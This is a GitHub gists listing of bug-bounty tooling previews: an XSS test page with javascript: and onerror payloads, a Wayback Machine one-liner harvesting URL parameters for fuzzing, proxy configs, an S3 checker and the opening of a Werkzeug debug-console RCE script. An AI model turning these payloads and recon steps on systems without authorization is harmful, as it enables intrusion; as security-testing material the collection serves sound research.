Arbaz Hussain arbazkiraak
✨
arbazkiraak
/ phantonjs-xss.html
Last active
September 15, 2019 23:47
— forked from yeukhon/test.html
Simple XSS detector using PhantomJS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head></head> | |
| <body> | |
| <a href="javascript: alert('clicked xss link')" id="link">click me</a> | |
| <img src="xx" onerror="alert('xss')" /> | |
| </body> | |
| </html> |
arbazkiraak
/ bbprograms.txt
Created
November 7, 2019 13:54
— forked from haxcited/bbprograms.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| google dork -> site:.co.uk inurl:"responsible disclosure" | |
| https://registry.internetnz.nz/about/vulnerability-disclosure-policy/ | |
| http://www.123contactform.com/security-acknowledgements.htm | |
| https://18f.gsa.gov/vulnerability-disclosure-policy/ | |
| https://support.1password.com/security-assessments/ | |
| https://www.23andme.com/security-report/ | |
| https://www.abnamro.com/en/footer/responsible-disclosure.html | |
| https://www.accenture.com/us-en/company-accenture-responsible-disclosure | |
| https://www.accredible.com/white_hat/ | |
| https://www.acquia.com/how-report-security-issue |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| import requests,sys | |
| import urllib3,queue,threading | |
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
| headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'} | |
| proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} | |
| urls_inp = sys.argv[1] |
arbazkiraak
/ gist:4defc9a0262c2ab115a996f3496be022
Created
April 16, 2020 04:46
— forked from screetsec/gist:6ee948503960f1b9d4b7b8465aea2d73
One Liner to get Hidden URL Parameter from Passive scan using Web Archive. Regex using DFA Engine, Support and Collecting URL with multi Parameter to Fuzzing & Removing Duplicate
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -s "http://web.archive.org/cdx/search/cdx?url=*.bugcrowd.com/*&output=text&fl=original&collapse=urlkey" | grep -P "=" | sed "/\b\(jpg\|png\|js\|svg\|css\|gif\|jpeg\|woff\|woff2\)\b/d" > Output.txt ; for i in $(cat Output.txt);do URL="${i}"; LIST=(${URL//[=&]/=FUZZ&}); echo ${LIST} | awk -F'=' -vOFS='=' '{$NF="FUZZ"}1;' >> Passive_Collecting_URLParamter.txt ; done ; rm Output.txt ; sort -u Passive_Collecting_URLParamter.txt > Passive_Collecting_URLParamter_Uniq.txt |
arbazkiraak
/ bb-foxyproxy-pattern.json
Created
July 2, 2020 18:05
— forked from ignis-sec/bb-foxyproxy-pattern.json
foxyproxy pattern (install Storage area explorer and import this file, foxyproxy import/export is broken)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "30523382": { | |
| "className": "Proxy", | |
| "data": { | |
| "bypassFPForPAC": true, | |
| "color": "#f57575", | |
| "configUrl": "", | |
| "credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=", | |
| "cycle": false, | |
| "enabled": true, |
arbazkiraak
/ foxyproxyBB.json
Created
October 2, 2020 04:18
— forked from 0xatul/foxyproxyBB.json
firefox foxy proxy settings for BB stuff
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "84kr3q1592995213323": { | |
| "type": 1, | |
| "color": "#cc883a", | |
| "title": "Burp", | |
| "active": true, | |
| "address": "127.0.0.1", | |
| "port": 8080, | |
| "proxyDNS": false, | |
| "username": "", |
arbazkiraak
/ s3_bucket_region_checker.py
Created
December 13, 2020 23:21
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import boto3,sys,time,requests | |
| import botocore.exceptions | |
| from urllib3.exceptions import InsecureRequestWarning | |
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) | |
| import datetime,os | |
| os.environ['AWS_DEFAULT_REGION'] = 'us-east-1' | |
| s3 = boto3.resource('s3') |
arbazkiraak
/ werkzeug_rce.py
Created
December 17, 2020 12:37
https://github.com/pallets/werkzeug
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import re | |
| import urllib,bs4 | |
| response = requests.get('%s/console' % (sys.argv[1])) | |
| if "Werkzeug powered traceback interpreter" not in response.text: | |
| print("[-] Debug is not enabled") | |
| sys.exit(-1) |
arbazkiraak
/ m_data_feed.py
Created
May 3, 2021 07:49
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import numpy as np | |
| import pandas as pd | |
| from binance.helpers import * | |
| from binance.client import Client | |
| from binance.websockets import BinanceSocketManager | |
| client = Client('API','SECRET') | |
| bm = BinanceSocketManager(client) |
arbazkiraak
/ api-linkfinder.sh
Created
August 7, 2021 14:30
— forked from nullenc0de/api-linkfinder.sh
Exports links and params from API documentation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget https://gist.githubusercontent.com/nullenc0de/bb16be959686295b3b1caff519cc3e05/raw/2016dc0e692821ec045edd5ae5c0aba5ec9ec3f1/api-linkfinder.yaml | |
| echo https://stripe.com/docs/api | hakrawler -t 500 -d 10 |nuclei -t ./linkfinder.yaml -o api.txt | |
| cat api.txt |grep url_params |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_params.txt | |
| cat api.txt |grep relative_links |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_link_finder.txt |